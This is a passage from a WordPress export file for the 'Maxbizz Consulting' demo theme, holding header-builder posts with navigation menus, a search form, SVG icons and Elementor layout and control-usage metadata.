:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:12:{s:21:"typography_typography";i:1;s:22:"typography_font_weight";i:1;s:17:"button_text_color";i:1;s:16:"background_color";i:1;s:11:"hover_color";i:1;s:29:"button_background_hover_color";i:1;s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:1:{s:12:"sticky_class";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:2:{s:10:"text_color";i:1;s:16:"text_hover_color";i:1;}s:19:"style_smenu_section";a:1:{s:23:"smenu_shadow_box_shadow";i:1;}}}}s:5:"icart";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header Mobile - Logo Left</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-mobile/</link>
		<pubDate>Fri, 22 May 2020 10:22:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=77</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz Consulting">
				</a>			        
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz-consulting/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>														
					<button></button>
						<a href="#"></a>
							<ul id="menu-main-menu"><li id="menu-item-1291"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-1292"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1320"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/about-us/">About Us</a></li>
	<li id="menu-item-1342"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Our Services 1</a></li>
	<li id="menu-item-1337"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1326"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1327"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/">Our Team</a></li>
	<li id="menu-item-1328"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1324"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/elements/">Elements</a></li>
	<li id="menu-item-1329"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/typography/">Typography</a></li>
	<li id="menu-item-1325"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/faqs/">FAQs</a></li>
	<li id="menu-item-1321"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/404-2/">404</a></li>
	<li id="menu-item-1322"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1340"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1343"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1341"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1339"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1346"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1338"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Services</a>
<ul>
	<li id="menu-item-1336"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1335"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1334"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1333"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1332"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1331"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1330"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog</a>
<ul>
	<li id="menu-item-1344"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog List</a></li>
	<li id="menu-item-1345"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1323"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/contacts/">Contacts</a></li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>77</wp:post_id>
		<wp:post_date><![CDATA[2020-05-22 10:22:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-05-22 10:22:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-mobile]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"e7c1045","elType":"section","settings":{"structure":"20","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"026b8ab","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":40},"elements":[{"id":"447392a","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350},"_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"172f4fe","elType":"column","settings":{"_column_size":50,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal","_inline_size_mobile":60},"elements":[{"id":"0514b95","elType":"widget","settings":{"icon_color":"#000000","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"f14cf6b","elType":"widget","settings":{"nav_menu":"main-menu","icon_color":"#000000","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"imenu_mobile"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-22]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:2;s:19:"_inline_size_mobile";i:2;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:12:"imenu_mobile";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-2/</link>
		<pubDate>Thu, 23 Jul 2020 03:53:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=106</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener">
						Instagram
											</a>
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>						
										Mon - Sat: 8.00 - 18.00
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>						
										411 University St, Seattle
									</li>
								<li>
					<a href="tel:+1-800-456-478-23">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>						
										+1-800-456-478-23
											</a>
									</li>
						</ul>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz Consulting">
				</a>			        
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-1643"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/">Home</a></li>
<li id="menu-item-1292"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1320"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/about-us/">About Us</a></li>
	<li id="menu-item-1342"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Our Services 1</a></li>
	<li id="menu-item-1337"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1326"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1327"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/">Our Team</a></li>
	<li id="menu-item-1328"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1324"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/elements/">Elements</a></li>
	<li id="menu-item-1329"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/typography/">Typography</a></li>
	<li id="menu-item-1325"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/faqs/">FAQs</a></li>
	<li id="menu-item-1321"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/404-2/">404</a></li>
	<li id="menu-item-1322"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1340"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1343"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1341"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1339"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1346"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1338"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Services</a>
<ul>
	<li id="menu-item-1336"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1335"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1334"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1333"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1332"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1331"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1330"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog</a>
<ul>
	<li id="menu-item-1344"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog List</a></li>
	<li id="menu-item-1345"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1323"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/contacts/">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz-consulting/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>														
			<a href="http://wpdemo.archiwp.com/maxbizz/contacts">free quote</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>106</wp:post_id>
		<wp:post_date><![CDATA[2020-07-23 03:53:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-23 03:53:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"cc784fd","elType":"section","settings":{"layout":"full_width","content_position":"middle","structure":"21","background_background":"classic","background_color":"#262832","margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"1d738b2","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"32895ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(255, 255, 255, 0)"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","item_icon_secondary_color":"#FFFFFF","_id":"e7140d6"}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.5,"sizes":[]},"icon_spacing":{"unit":"px","size":8,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0.3)","_padding":{"unit":"px","top":"7","right":"0","bottom":"7","left":"0","isLinked":false},"icon_color":"custom","hover_primary_color":"#18A6F0","hover_border_color":"#18A6F0","columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"78dcf95","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"c94f846","elType":"widget","settings":{"view":"inline","icon_list":[{"text":"Mon - Sat: 8.00 - 18.00","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"_id":"e6e2d89"},{"text":"411 University St, Seattle","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"_id":"6e383c8"},{"text":"+1-800-456-478-23","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"_id":"25c4675","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":45,"sizes":[]},"icon_align":"right","icon_color":"#4B83FC","text_color":"#FFFFFF","text_indent":{"unit":"px","size":7,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_line_height":{"unit":"em","size":1,"sizes":[]},"icon_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"8","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"}],"isInner":false}],"isInner":false},{"id":"37d086b","elType":"section","settings":{"layout":"full_width","structure":"33","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.09)"},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false},"sticky_class":"is-fixed","sticky_background":"#FFFFFF"},"elements":[{"id":"d44a756","elType":"column","settings":{"_column_size":25,"_inline_size":18.047000000000000596855898038484156131744384765625},"elements":[{"id":"76a2789","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350},"_padding":{"unit":"px","top":"26","right":"0","bottom":"28","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"a71a42c","elType":"column","settings":{"_column_size":50,"_inline_size":63.90599999999999880628820392303168773651123046875,"align":"center","_ot_content_align":"horizontal","margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true}},"elements":[{"id":"a6322eb","elType":"widget","settings":{"nav_menu":"main-menu","space_item":{"unit":"px","size":29,"sizes":[]},"text_hover_color":"#4B82FB","_margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"menu_typography_typography":"custom","menu_typography_font_size":{"unit":"px","size":14,"sizes":[]},"menu_typography_font_weight":"700","smenu_typography_typography":"custom"},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"990f116","elType":"column","settings":{"_column_size":25,"_inline_size":18.0270000000000010231815394945442676544189453125,"align":"flex-end","_ot_content_align":"horizontal","_ot_column_min_width":{"unit":"px","size":260,"sizes":[]}},"elements":[{"id":"3ea33c9","elType":"widget","settings":{"bg_btn":"#4B83FC","_margin":{"unit":"px","top":"0","right":"40","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"f41aa01","elType":"widget","settings":{"text":"free quote","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contacts","is_external":"","nofollow":"","custom_attributes":""},"btn_bg":"#4A81F9","_padding":{"unit":"px","top":"16","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:7:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;}s:20:"section_social_hover";a:2:{s:19:"hover_primary_color";i:1;s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:5;s:5:"align";i:2;s:17:"_ot_content_align";i:2;s:20:"_ot_column_min_width";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:6:"margin";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:2:{s:4:"view";i:1;s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:2:{s:13:"space_between";i:1;s:10:"icon_align";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:6:{s:10:"text_color";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:2:{s:12:"sticky_class";i:1;s:17:"sticky_background";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:6:"margin";i:1;s:7:"padding";i:2;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:5:"style";a:2:{s:18:"style_menu_section";a:5:{s:10:"space_item";i:1